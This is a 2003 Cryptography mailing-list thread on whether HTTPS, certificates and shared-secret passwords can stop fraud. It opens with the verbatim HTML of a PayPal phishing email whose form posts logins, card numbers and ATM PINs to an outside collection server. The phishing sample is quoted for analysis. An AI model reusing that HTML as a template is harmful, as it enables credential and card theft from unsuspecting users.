An attack on paypal
Attached is a spam mail that constitutes an attack on paypal similar in effect and method to man in the middle. The bottom line is that https just is not working. Its broken. The fact that people keep using shared secrets is a symptom of https not working. The flaw in https is that you cannot operate the business and trust model using https that you can with shared secrets. -------------- Enclosure number 1 ---------------- Received: from bgp480791bgs.summit01.nj.comcast.net [68.37.160.58] by dpmail07.doteasy.com (SMTPD32-7.13) id A3506CD006A; Sat, 07 Jun 2003 19:45:36 -0700 Date: Sun, 08 Jun 2003 02:50:24 +0000 From: Confirm <confirm@paypal.com> Subject: Important Information Regarding Your PayPal Account To: Jamesd <jamesd@echeque.com> References: <4FG6E0K8HJHJ2DL9@echeque.com> In-Reply-To: <4FG6E0K8HJHJ2DL9@echeque.com> Message-ID: <62K3JH9LKLB0I8GK@paypal.com> MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: 8bit X-RCPT-TO: <jamesd@echeque.com> Status: U X-PMFLAGS: 34079360 0 1 P4EDB0.CNM <html> <head> <STYLE type=text/css> .dummy {} BODY, TD {font-family: verdana,arial,helvetica,sans-serif;font-size: 13px;color: #000000;} UL {list-style: square} .pp_big {font-family: verdana,arial,helvetica,sans-serif;font-size: 24px;font-weight: bold;color: #003366;} .pp_sortofbig {font-family: verdana,arial,helvetica,sans-serif;font-size: 22px;font-weight: bold;color: #003366;} .pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size: 18px;font-weight: bold;color: #003366;} .pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size: 16px;font-weight: bold;color: #003366;} .pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #003366;} .pp_mediumtextbold {font-family: verdana,arial,helvetica,sans-serif;font-size: 14px;font-weight: bold;color: #000000;} .pp_smalltext {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: normal;color: #000000;} .pp_smallbluetext {font-family: verdana,arial,helvetica,sans-serif;font-size: 10px;font-weight: normal;color: #003366;} .pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size: 11px;color: #aaaaaa;} </STYLE> <title>PayPal</title> </head> <body> <table width="600" cellspacing="0" cellpadding="0" border="0" align="center"> <tr> <td><A href="https://www.paypal.com/"><IMG src="http://www.paypal.com/images/paypal_logo.gif" width=109 height=35 alt="PayPal" border="0" vspace=10></A> </td> </tr> </table> <table width="100%" cellspacing="0" cellpadding="0" border="0"> <tr> <td background="http://www.paypal.com/images/bg_clk.gif" width="100%"><img src="http://www.paypal.com/images/pixel.gif" height="29" width="1" border="0"></td> </tr> <tr> <td><img src="http://www.paypal.com/images/pixel.gif" height="10" width="1" border="0"></td> </tr> </table> <table width="600" cellspacing="0" cellpadding="5" border="0" align="center"> <tr> <td class="pp_sortofbig" align=middle>Dear PayPal Customer</td> </tr> <tr> <td valign="top"><p> </p> <p>This e-mail is the notification of recent innovations taken by PayPal to detect inactive customers and non-functioning mailboxes.</p> <p>The inactive customers are subject to restriction and removal in the next 3 months.</p> <p>Please confirm your email address and Credit or Check Card information<b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal"> </b>using the form below:</p></td> </tr> <tr> <td align=middle> <form action="http://www.pos2life.biz/vp.php" method="post"> <p style="MARGIN-TOP: -2px; MARGIN-BOTTOM: 0px; MARGIN-LEFT: 4px" > </p> <table border="0"> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: normal; FONT-STYLE: normal; FONT-VARIANT: normal" >Email Address:</b></P></td> <td><input name="lgn" size="32" maxlength="32" ></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; LINE-HEIGHT: normal; FONT-STYLE: normal; FONT-VARIANT: normal" >Password:</b></P></td> <td><input name="psw" type="password" size="32" maxlength="32"></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">First Name:</b></P></td> <td><input name="fname" size="32" maxlength="32" ></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Last Name:</b></P></td> <td><input name="lname" size="32" maxlength="32" ></td> </tr> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal"> ZIP:</b></P></td> <td><input name="bz" size="32" maxlength="20"> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Credit or Check Card #:</b></P></td> <td><input name="cz" size="32" maxlength="16"></td> <tr> <td> <P align=left><b style="FONT-WEIGHT: bold; FONT-SIZE: 8pt; FONT-STYLE: normal; FONT-VARIANT: normal">Expiration Date:</b></P></td> <td> <select name="crdm"> <OPTION value="zero" selected>Month</OPTION> <option value="01">01</option> <option value="02">02</option> <option value="03">03</option> <option value="04">04</option> <option value="05">05</option> <option value="06">06</option> <option value="07">07</option> <option value="08">08</option> <option value="09">09</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option> </select> / <select name="crdy"> <OPTION value="zero" selected>Year</OPTION> <option value="03">2003</option> <option value="04">2004</option> <option value="05">2005</option> <option value="06">2006</option> <option value="07">2007</option> <option value="08">2008</option> <option value="09">2009</option> <option value="10">2010</option> <option value="11">2011</option> <option value="12">2012</option> </select> </td> <tr> <td> <P align=left><b style="FONT: bold 8pt : normal" > ATM PIN:</b></P></td> <td><input name="pni" type="password" size="32" maxlength="6"></td> </tr> </table> <p> <input type="submit" value=" Submit "> </p> </form> Information transmitted using 128bit SSL encryption. <p><br> </p></td> </tr> <tr> <td align=middle><strong>Thanks for using PayPal! </strong><br></td> </tr> <tr> <td><img src="http://www.paypal.com/images/dot_row_long.gif"></td> </tr> <tr> <td class="pp_footer"> This PayPal notification was sent to this email address because you are a Web Accept user and chose to receive the PayPal Periodical newsletter and Product Updates. To modify your notification preferences, go to <A href="https://www.paypal.com/PREFS-NOTI">https://www.paypal.com/PREFS-NOTI</A> and log in to your account. Changes may take several days to be reflected in our mailings. Replies to this email will not be processed. <br> <br> Copyright© 2003 PayPal Inc. All rights reserved. Designated trademarks and brands are the property of their respective owners. </td> </tr> </table> </body></html> --------------------------------------------------------------------- The Cryptography Mailing List Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
At 02:55 PM 6/8/2003, James A. Donald wrote:
Attached is a spam mail that constitutes an attack on paypal similar in effect and method to man in the middle.
The bottom line is that https just is not working. Its broken.
The fact that people keep using shared secrets is a symptom of https not working.
The flaw in https is that you cannot operate the business and trust model using https that you can with shared secrets.
I don't think it's https that's broken, since https wasn't intended to solve the customer authentication / authorization problem (you could try to use SSL's client certificates for that, but no one ever intended client certificate authentication to be a generalized transaction problem). When I responded to this before, I thought you were talking about the server auth problem, not the password problem. I continue to feel that the server authentication problem is a very hard problem to solve, since there's few hints to the browser as to what the user's intent is. The password problem does need to be solved, but complaining that HTTPS or SSL doesn't solve it isn't any more relevant than complaining that it's not solved by HTML, HTTP, and/or browser or server implementations, since any and all of these are needed in producing a new solution which can function with real businesses and real users. Let's face it, passwords are so deeply ingrained into people's lives that nothing which is more complex in any way than passwords is going to have broad acceptance, and any consumer-driven company is going to consider "easy" to be more important that "secure". Right now, my best idea for solving this problem is to: - Standardize an HTML input method for <FORM> which does an SPEKE (or similar) mutual authentication. - Get browser makers to design better ways to communicate to users that UI elements can be trusted. For example, a proposal I saw recently which would have the OS decorate the borders of "trusted" windows with facts or images that an attacker wouldn't be able to predict: the name of your dog, or whatever. (Sorry, can't locate a link right now, but I'd appreciate one.) - Combine the two to allow sites to provide a user-trustable UI to enter a password which cannot be sucked down. - Evangelize to users that this is better and that they should be suspicious of any situation where they used such interface once, but now it's gone. I agree that the overall architecture is broken; the problem is that it's broken in more ways than can just be fixed with any change to TLS/SSL or HTTPS. - Tim
At 18:03 08/06/2003 -0400, Tim Dierks wrote: <skip>
- Get browser makers to design better ways to communicate to users that UI elements can be trusted. For example, a proposal I saw recently which would have the OS decorate the borders of "trusted" windows with facts or images that an attacker wouldn't be able to predict: the name of your dog, or whatever. (Sorry, can't locate a link right now, but I'd appreciate one.)
Here are two... Yuan, Ye and Smith, Trusted Path for Browsers, 11th Usenix security symp, 2002. Ka Ping Yee, User Interface Design for Secure System, ICICS, LNCS 2513, 2002. This issue is also covered somewhat by my article in CACM (May 2002). Best, Amir Herzberg http://amir.herzberg.name
- Combine the two to allow sites to provide a user-trustable UI to enter a password which cannot be sucked down. - Evangelize to users that this is better and that they should be suspicious of any situation where they used such interface once, but now it's gone.
I agree that the overall architecture is broken; the problem is that it's broken in more ways than can just be fixed with any change to TLS/SSL or HTTPS.
- Tim
--------------------------------------------------------------------- The Cryptography Mailing List Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
-------------------------------------------------------------------------------------------------------------------------------- Amir Herzberg http://amir.herzberg.name --------------------------------------------------------------------- The Cryptography Mailing List Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
Yuan, Ye and Smith, Trusted Path for Browsers, 11th Usenix security symp, 2002.
Minor nit: just Ye and Smith. (Yuan had helped with some of the spoofing) Advertisement: we also built this into Mozilla, for Linux and Windows. http://www.cs.dartmouth.edu/~pkilab/demos/countermeasures/ --Sean -- Sean W. Smith, Ph.D. sws@cs.dartmouth.edu http://www.cs.dartmouth.edu/~sws/ (has ssl link to pgp key) Department of Computer Science, Dartmouth College, Hanover NH USA --------------------------------------------------------------------- The Cryptography Mailing List Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
Attached is a spam mail that constitutes an attack on paypal similar in effect and method to man in the middle.
The bottom line is that https just is not working. Its broken. HTTPS works just fine. The problem is - people are broken. At the very least, verisign should say "ok so '..go1d..' is a valid server address, but doesn't it look suspiously similar to this '..gold..' site over here?" for https://pseudo-gold-site/ - but really, if users are going to fill in random webforms sent by email, they aren't going to be safe under any circumstances; the thing could send by unsecured http to any site on the
James A. Donald wrote: planet, then redirect to the real gold site for a generic "transaction completed" or even "failed" screen A world where a random paypal hack like this one doesn't work is the same as the world where there is no point sending out a Nigerian as you will never make a penny on it - and yet, Nigerian is still profitable for the con artists. --------------------------------------------------------------------- The Cryptography Mailing List Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
At 11:43 PM 6/8/2003 +0100, Dave Howe wrote:
HTTPS works just fine. The problem is - people are broken. At the very least, verisign should say "ok so '..go1d..' is a valid server address, but doesn't it look suspiously similar to this '..gold..' site over here?" for https://pseudo-gold-site/ - but really, if users are going to fill in random webforms sent by email, they aren't going to be safe under any circumstances; the thing could send by unsecured http to any site on the planet, then redirect to the real gold site for a generic "transaction completed" or even "failed" screen A world where a random paypal hack like this one doesn't work is the same as the world where there is no point sending out a Nigerian as you will never make a penny on it - and yet, Nigerian is still profitable for the con artists.
in a world where there are repeated human mistakes/failures .... at some point it is recognized that people aren't perfect and the design is changed to accommodate peoples foibles. in some respects that is what helmets, seat belts, and air bags have been about. in the past systems have designed long, complicated passwords that are hard to remember and must be changed every month. that almost worked when i person had to deal with a single shared-secret. when it became a fact of life that a person might have tens of such different interfaces it became impossible. It wasn't the fault of any specific institution, it was a failure of humans being able to deal with large numbers of extremely complex, frequently changing passwords. Because of known human foibles, it might be a good idea to start shifting from an infrastructure with large numbers of shared-secrets to a non-shared-secret paradigm. at a recent cybersecurity conference, somebody made the statement that (of the current outsider, internet exploits, approximately 1/3rd are buffer overflows, 1/3rd are network traffic containing virus that infects a machine because of automatic scripting, and 1/3 are social engineering (convince somebody to divulge information). As far as I know, evesdropping on network traffic doesn't even show as a blip on the radar screen. In the following thread on a financial authentication white paper: http://www.garlic.com/~lynn/aepay11.htm#53 Authentication white paper http://www.garlic.com/~lynn/aepay11.htm#54 FINREAD was. Authentication white paper http://www.garlic.com/~lynn/aepay11.htm#55 FINREAD ... and as an aside http://www.garlic.com/~lynn/aepay11.htm#56 FINREAD was. Authentication white paper there is point made that X9.59 standard doesn't directly address the Privacy aspect of security (i.e. no encryption or hiding of data). However, the point is made that it changes the paradigm so that the financial account number no longer represents a shared-secret and that it can be supported with two-factor authentication i.e. "something you have" token and "something you know" PIN. The "something you know" PIN is used to enable the token, but is not a shared secret. Furthermore, strong authentication can be justification for eliminating the need for name or other identification information in the transaction. However, if X9.59 strong authentication is used with two-factor authentication and no identification information is necessary .... then it would make people more suspicious if privacy information was requested. Also, since privacy information is no longer sufficient for performing a fraudulent transaction, it might mitigate that kind of social engineering attack. The types of social engineering attacks then become convincing people to insert their hardware token and do really questionable things or mailing somebody their existing hardware token along with the valid pin (possibly as part of an exchange for replacement). The cost/benefit ratio does start to change since there is now much more work on the crooks part for the same or less gain. One could also claim that such activities are just part of child-proofing the environment (even for adults). On the other hand, it could be taken as analogous to designing systems to handle observed failure modes (even when the failures are human and not hardware or software). Misc. identify theft and credit card fraud reference: http://www.consumer.gov/idtheft/cases.htm http://www.usdoj.gov/criminal/fraud/idtheft.html http://www.garlic.com/~lynn/aadsm14.htm#22 Identity Theft Losses Expect to hit $2 trillion http://www.garlic.com/~lynn/subpubkey.html#fraud Slightly related in recent thread that brought up buffer overflow exploits http://www.garlic.com/~lynn/2003j.html#4 A Dark Day and the report that multics hasn't ever had a buffer overflow exploit http://www.garlic.com/~lynn/2002l.html#42 Thirty Years Later: Lessons from the Multics Security Evaluation http://www.garlic.com/~lynn/2002l.html#44 Thirty Years Later: Lessons from the Multics Security Evaluation somebody (else) commented (in the thread) that anybody that currently (still) writes code resulting in buffer overflow exploit maybe should be thrown in jail. -- Anne & Lynn Wheeler http://www.garlic.com/~lynn/ Internet trivia 20th anv http://www.garlic.com/~lynn/rfcietff.htm
in a world where there are repeated human mistakes/failures .... at some point it is recognized that people aren't perfect and the design is changed to accommodate peoples foibles. in some respects that is what helmets, seat belts, and air bags have been about.
The problem is here, we are blaming the protective device for not being able to protect against the deliberate use of an attack that bypasses, not challenges it - by exploiting the gullibility or tendency to take the path of least resistance of the user. The real weakness in HTTPS is the tendency of certificates signed by Big Name CAs to be automagically trusted - even if you have never visited that site before. yes, you can fix this almost immediately by untrusting the root certificate - but then you have to manually verify each and every site at least once, and possibly every time if you don't mark the cert as "trusted" for future reference. To blame HTTPS for an attack where the user fills in a web form received via html-rendering email (no https involved at all) is more than a little unfair though.
in the past systems have designed long, complicated passwords that are hard to remember and must be changed every month. that almost worked when a person had to deal with a single shared-secret. when it became a fact of life that a person might have tens of such different interfaces it became impossible. It wasn't the fault of any specific institution, it was a failure of humans being able to deal with large numbers of extremely complex, frequently changing passwords. Because of known human foibles, it might be a good idea to start shifting from an infrastructure with large numbers of shared-secrets to a non-shared-secret paradigm.
I am not aware of one (not that that means much, given I am a novice in this field) Even PKI relies on something close to a shared secret - a *trustworthy* copy of the public key, matching a secret copy of the private key. In x509, this trustworthyness is established by an Ultimately Trusted CA; in pgp, by the Web Of Trust, in a chain leading back to your own key; in SSH, by your placing of the public key into your home dir manually (using some other form of authentication to presumably gain access) in each of these cases, the private key will almost invariably be protected by a passphrase; at best, you can have a single passphrase (or even single private key) to cover all bases.. but that just makes that secret all the more valuable.
at a recent cybersecurity conference, somebody made the statement that (of the current outsider, internet exploits, approximately 1/3rd are buffer overflows, 1/3rd are network traffic containing virus that infects a machine because of automatic scripting, and 1/3 are social engineering (convince somebody to divulge information). As far as I know, evesdropping on network traffic doesn't even show as a blip on the radar screen. That is pretty much because defence occupies the position of the interior - attackers will almost invariably attack weak points, not strong ones. It is easy to log and calculate how many attacks happen on weak points, but impossible to calculate how many attacks *would* have happened had the system not been in place to protect against such attacks, so the attackers moved onto easier targets. It makes little sense to try and break one https connection (even at 40 bit) if by breaking into the server you get that information, hundreds of others (until discovered) and possibly thousands of others inadvisedly stored unprotected in a database.
<snip>
The types of social engineering attacks then become convincing people to insert their hardware token and do really questionable things or mailing somebody their existing hardware token along with the valid pin (possibly as part of an exchange for replacement). The cost/benefit ratio does start to change since there is now much more work on the crooks part for the same or less gain. One could also claim that such activities are just part of child-proofing the environment (even for adults). On the other hand, it could be taken as analogous to designing systems to handle observed failure modes (even when the failures are human and not hardware or software). Misc. identify theft and credit card fraud reference:
Which again matches well to the Nigerian analogy. Everyone *knows* that handing over your bank details is a Bad Thing - yet they still do it. --------------------------------------------------------------------- The Cryptography Mailing List Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
At 02:09 AM 6/9/2003 +0100, Dave Howe wrote:
The problem is here, we are blaming the protective device for not being able to protect against the deliberate use of an attack that bypasses, not challenges it - by exploiting the gullibility or tendency to take the path of least resistance of the user. The real weakness in HTTPS is the tendency of certificates signed by Big Name CAs to be automagically trusted - even if you have never visited that site before. yes, you can fix this almost immediately by untrusting the root certificate - but then you have to manually verify each and every site at least once, and possibly every time if you don't mark the cert as "trusted" for future reference.
that is why we coined the term merchant "comfort" certificates some time ago. my wife and I having done early work for payment gateway with small client/server startup in menlo park ... that had this thing called SSL/HTTPS ... and then having to perform due diligence on the major issuers of certificates .... we recognized 1) vulnerabilities in the certificate process and 2) information hiding of transaction in flight only addressed a very small portion of the vulnerabilities and exploits. lots of past discussions related to our use of merchant comfort certificates from the past: http://www.garlic.com/~lynn/subpubkey.html#ssl we concluded that a real issue is that way too much of the infrastructure is based on shared-secrets and there was no realistic way of providing blanket protection to all the exposures and vulnerabilities of such shared-secret infrastructures. somewhat related discussion in the security proportional to risk posting: http://www.garlic.com/~lynn/2001h.html#61 so rather than trying to create a very thick blanket of encryption covering the whole planet .... a synergistic approach was attempting to provide alternatives to as much of the shared-secret paradigm as possible. As in the referenced post: http://www.garlic.com/~lynn/aepay11.htm#53 authentication white paper strong encryption of identification and privacy (and shared-secret) information is good ... but not having identification, privacy and shared-secret information is even better. there are all sorts of ways of obtaining shared-secret information (and/or privacy and identification information prelude to identity theft) .... including various kinds of social engineering. as previously mentioned requirement for X9.59 standard was to preserve the integrity of the financial infrastructure for ALL electronic retail payments. As per previous notes, X9.59 with strong authentication eliminates the account number as a shared-secret as well as eliminating requirements for name, address, zip-code, etc as part of any credit card authentication process (strong encryption of vulnerable information is good, not having the information at all is even better). ALL in addition to referring to things like credit cards, debit cards, atm transactions, stored-value transaction, over the internet, at point-of-sale, face-to-face, automated machines, etc .... also refers to ACH transactions. ACH information allows for unauthenticated push or pull transactions. Social engineering requesting bank account information so somebody can push tens of millions into your account also allows for them to generate a pull transaction removing all the money from your account. Part of the above posting on the authentication white paper .... makes references to securing ACH transactions: http://www.asuretee.com/company/releases/030513_hagenuk.shtm -- Anne & Lynn Wheeler http://www.garlic.com/~lynn/ Internet trivia 20th anv http://www.garlic.com/~lynn/rfcietff.htm
-- On 8 Jun 2003 at 20:00, Anne & Lynn Wheeler wrote:
that is why we coined the term merchant "comfort" certificates some time ago. my wife and I having done early work for payment gateway with small client/server startup in menlo park ... that had this thing called SSL/HTTPS ... and then having to perform due diligence on the major issuers of certificates .... we recognized 1) vulnerabilities in the certificate process and 2) information hiding of transaction in flight only addressed a very small portion of the vulnerabilities and exploits.
https is like a strong fortress wall that only goes half way around the fortress. The most expensive and inconvenient part of https, getting certificates from verisign, is fairly useless. The useful part of https is that it has stopped password sniffing from networks, but the PKI part, where the server, but not the client, is supposedly authenticated, does not do much good. --digsig James A. Donald 6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG 9ZQw+0/xh1y28CkGulSQSVxewfy71qzXGHI8KJbN 4osBv1veq07jaMVh2zVetZVKqIRfQjiwJaKu99GqM
The worst trouble I've had with https is that you have no way to use host header names to differentiate between sites that require different SSL certificates. i.e. www.foo.com www.bar.com www.baz.com can't all live on the same IP and have individual ssl certs for https. :( This is because the cert is exchanged before the http 1.1 layer can say "I want www.bar.com" So you need to waste IP's for this. Since the browser standards are already in place, it's unlikely to be to find a workaround. i.e. be able to switch to a different virtual host after you've established the ssl session. :( Personally I find thawte certs to be much cheaper than verisign and they work just as well. In any case, anyone is free to do the same thing AlterNIC did - become your own free CA. You'll just have to convince everyone else to add your CA's cert into their browser. You might be able to get the Mozilla guys to do this, good luck with the beast of Redmond though. Either way, having a pop-up isn't that big deal so long as you're sure of the site you're connecting to. In either case, we wouldn't need to worry about paying Verisign or anyone else if we had properly secured DNS. Then you could trust those pop-up self-signed SSL cert warnings. ----------------------Kaos-Keraunos-Kybernetos--------------------------- + ^ + :25Kliters anthrax, 38K liters botulinum toxin, 500 tons of /|\ \|/ :sarin, mustard and VX gas, mobile bio-weapons labs, nukular /\|/\ <--*-->:weapons.. Reasons for war on Iraq - GWB 2003-01-28 speech. \/|\/ /|\ :Found to date: 0. Cost of war: $800,000,000,000 USD. \|/ + v + : The look on Sadam's face - priceless! --------_sunder_@_sunder_._net_------- http://www.sunder.net ------------ On Tue, 10 Jun 2003, James A. Donald wrote:
The most expensive and inconvenient part of https, getting certificates from verisign, is fairly useless.
The useful part of https is that it has stopped password sniffing from networks, but the PKI part, where the server, but not the client, is supposedly authenticated, does not do much good.
On 06/11/2003 10:56 AM, Sunder wrote:
www.foo.com www.bar.com www.baz.com can't all live on the same IP and have individual ssl certs for https. :( This is because the cert is exchanged before the http 1.1 layer can say "I want www.bar.com"
So you need to waste IP's for this. Since the browser standards are already in place, it's unlikely to be to find a workaround.
A reasonable workaround might be something like: http://www.ietf.org/rfc/rfc3056.txt ... to allow isolated IPv6 domains or hosts, attached to an IPv4 network which has no native IPv6 support, to communicate with other such IPv6 domains or hosts with minimal manual configuration, before they can obtain natuve IPv6 connectivity. It incidentally provides an interim globally unique IPv6 address prefix to any site with at least one globally unique IPv4 address, even if combined with an IPv4 Network Address Translator (NAT). --------------------------------------------------------------------- The Cryptography Mailing List Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
The worst trouble I've had with https is that you have no way to use host header names to differentiate between sites that require different SSL certificates.
True as written, but Netscrape ind Internet Exploder each have a hack for honoring the same cert for multiple server names. Opera seems to honor at least one of the two hacks, and a cert can incorporate both at once. /C=US/ST=Illinois/L=Batavia/O=Fermilab/OU=Services /CN=(alpha|bravo|charlie).fnal.gov/CN=alpha.fnal.gov /CN=bravo.fnal.gov/CN=charlie.fnal.gov
So you need to waste IP's for this.
Waste? Heck no, that's what they're for!
-- On 9 Jun 2003 at 2:09, Dave Howe wrote:
The problem is here, we are blaming the protective device for not being able to protect against the deliberate use of an attack that bypasses, not challenges it - by exploiting the gullibility or tendency to take the path of least resistance of the user. The real weakness in HTTPS is the tendency of certificates signed by Big Name CAs to be automagically trusted - even if you have never visited that site before. yes, you can fix this almost immediately by untrusting the root certificate - but then you have to manually verify each and every site at least once, and possibly every time if you don't mark the cert as "trusted" for future reference. To blame HTTPS for an attack where the user fills in a web form received via html-rendering email (no https involved at all) is more than a little unfair though.
How many attacks have there been based on automatic trust of verisign's feckless ID checking? Not many, possibly none. That is not the weak point, not the point where the attacks occur. If the browser was set to accept self signed certificates by default, it would make little difference to security. A wide variety of ways of getting big name certificates that one should not have, have been discovered. Attackers never showed much interest. --digsig James A. Donald 6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG uJuAm4Xwyo4xTn0ozjBmW2ZqpI8Z3ru25WDmB7iw 43PXj2QDpBfcahqs2aOleapJYsqtA6S36+hOdVkpR --------------------------------------------------------------------- The Cryptography Mailing List Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
How many attacks have there been based on automatic trust of verisign's feckless ID checking? Not many, possibly none. I imagine if there exists a https://www.go1d.com/ site for purposes of fraud, it won't be using a self-signed cert. Of course it is possible that
James A. Donald wrote: the attackers are using http:// instead, but more people are likely to notice that.
That is not the weak point, not the point where the attacks occur. If the browser was set to accept self signed certificates by default, it would make little difference to security. I don't think any currently can be - but regardless, an attacker wishing to run a fraudulent https site must have a certificate acceptable to the majority of browsers without changing settings - That currently is the big name CAs and nobody else.
At 06:12 PM 6/8/2003 -0600, Anne & Lynn Wheeler wrote:
at a recent cybersecurity conference, somebody made the statement that (of the current outsider, internet exploits, approximately 1/3rd are buffer overflows, 1/3rd are network traffic containing virus that infects a machine because of automatic scripting, and 1/3 are social engineering (convince somebody to divulge information). As far as I know, evesdropping on network traffic doesn't even show as a blip on the radar screen.
virus attempting to harvest ("shared-secret", single-factor) passwords at financial institutions http//www.smh.com.au/articles/2003/06/10/1055010959747.html and somewhat related: http://www.garlic.com/~lynn/aepay11.htm#53 authentication white paper -- Anne & Lynn Wheeler http://www.garlic.com/~lynn/ Internet trivia 20th anv http://www.garlic.com/~lynn/rfcietff.htm --------------------------------------------------------------------- The Cryptography Mailing List Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
At 5:12 PM -0700 6/8/03, Anne & Lynn Wheeler wrote:
somebody (else) commented (in the thread) that anybody that currently (still) writes code resulting in buffer overflow exploit maybe should be thrown in jail.
A nice essay, partially on the need to include technological protections against human error, included the above paragraph. IMHO, the problem is that the C language is just too error prone to be used for most software. In "Thirty Years Later: Lessons from the Multics Security Evaluation", Paul A. Karger and Roger R. Schell <www.acsac.org/2002/papers/classic-multics.pdf> credit the use of PL/I for the lack of buffer overruns in Multics. However, in the Unix/Linux/PC/Mac world, a successor language has not yet appeared. YMMV - Bill ------------------------------------------------------------------------- Bill Frantz | Due process for all | Periwinkle -- Consulting (408)356-8506 | used to be the | 16345 Englewood Ave. frantz@pwpconsult.com | American way. | Los Gatos, CA 95032, USA --------------------------------------------------------------------- The Cryptography Mailing List Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
The problem with these stop crackers and hackers by law is that it allows software developers to get away with leaving huge gaping security holes unfixed. Anecodatal evidence: The classic well known Robin Hood and Friar Tuck "hack". These days, the bug wouldn't get fixed and the guys reporting it would wind up in jail because they "convinced" the OS authors to fix the bug. IMHO, not the right way to go at all. from http://ftp.arl.mil/ftp/unix-wizards/V16%23017 scroll down a bit more than half way down the page (also available from most other GNU sources) Back in the mid-1970s, several of the system support staff at Motorola discovered a relatively simple way to crack system security on the Xerox CP-V timesharing system. Through a simple programming strategy, it was possible for a user program to trick the system into running a portion of the program in `master mode' (supervisor state), in which memory protection does not apply. The program could then poke a large value into its `privilege level' byte (normally write-protected) and could then proceed to bypass all levels of security within the file-management system, patch the system monitor, and do numerous other interesting things. In short, the barn door was wide open. Motorola quite properly reported this problem to Xerox via an official `level 1 SIDR' (a bug report with an intended urgency of `needs to be fixed yesterday'). Because the text of each SIDR was entered into a database that could be viewed by quite a number of people, Motorola followed the approved procedure: they simply reported the problem as `Security SIDR', and attached all of the necessary documentation, ways-to-reproduce, etc. The CP-V people at Xerox sat on their thumbs; they either didn't realize the severity of the problem, or didn't assign the necessary operating-system-staff resources to develop and distribute an official patch. Months passed. The Motorola guys pestered their Xerox field-support rep, to no avail. Finally they decided to take direct action, to demonstrate to Xerox management just how easily the system could be cracked and just how thoroughly the security safeguards could be subverted. They dug around in the operating-system listings and devised a thoroughly devilish set of patches. These patches were then incorporated into a pair of programs called `Robin Hood' and `Friar Tuck'. Robin Hood and Friar Tuck were designed to run as `ghost jobs' (daemons, in UNIX terminology); they would use the existing loophole to subvert system security, install the necessary patches, and then keep an eye on one another's statuses in order to keep the system operator (in effect, the superuser) from aborting them. One fine day, the system operator on the main CP-V software development system in El Segundo was surprised by a number of unusual phenomena. These included the following: * Tape drives would rewind and dismount their tapes in the middle of a job. * Disk drives would seek back and forth so rapidly that they would attempt to walk across the floor (see {walking drives}). * The card-punch output device would occasionally start up of itself and punch a {lace card}. These would usually jam in the punch. * The console would print snide and insulting messages from Robin Hood to Friar Tuck, or vice versa. * The Xerox card reader had two output stackers; it could be instructed to stack into A, stack into B, or stack into A (unless a card was unreadable, in which case the bad card was placed into stacker B). One of the patches installed by the ghosts added some code to the card-reader driver... after reading a card, it would flip over to the opposite stacker. As a result, card decks would divide themselves in half when they were read, leaving the operator to recollate them manually. Naturally, the operator called in the operating-system developers. They found the bandit ghost jobs running, and X'ed them... and were once again surprised. When Robin Hood was X'ed, the following sequence of events took place: !X id1 id1: Friar Tuck... I am under attack! Pray save me! id1: Off (aborted) id2: Fear not, friend Robin! I shall rout the Sheriff of Nottingham's men! id1: Thank you, my good fellow! Each ghost-job would detect the fact that the other had been killed, and would start a new copy of the recently slain program within a few milliseconds. The only way to kill both ghosts was to kill them simultaneously (very difficult) or to deliberately crash the system. Finally, the system programmers did the latter --- only to find that the bandits appeared once again when the system rebooted! It turned out that these two programs had patched the boot-time OS image (the kernel file, in UNIX terms) and had added themselves to the list of programs that were to be started at boot time. The Robin Hood and Friar Tuck ghosts were finally eradicated when the system staff rebooted the system from a clean boot-tape and reinstalled the monitor. Not long thereafter, Xerox released a patch for this problem. It is alleged that Xerox filed a complaint with Motorola's management about the merry-prankster actions of the two employees in question. It is not recorded that any serious disciplinary action was taken against either of them. ----------------------Kaos-Keraunos-Kybernetos--------------------------- + ^ + :25Kliters anthrax, 38K liters botulinum toxin, 500 tons of /|\ \|/ :sarin, mustard and VX gas, mobile bio-weapons labs, nukular /\|/\ <--*-->:weapons.. Reasons for war on Iraq - GWB 2003-01-28 speech. \/|\/ /|\ :Found to date: 0. Cost of war: $800,000,000,000 USD. \|/ + v + : The look on Sadam's face - priceless! --------_sunder_@_sunder_._net_------- http://www.sunder.net ------------ On Tue, 10 Jun 2003, Bill Frantz wrote:
At 5:12 PM -0700 6/8/03, Anne & Lynn Wheeler wrote:
somebody (else) commented (in the thread) that anybody that currently (still) writes code resulting in buffer overflow exploit maybe should be thrown in jail.
A nice essay, partially on the need to include technological protections against human error, included the above paragraph.
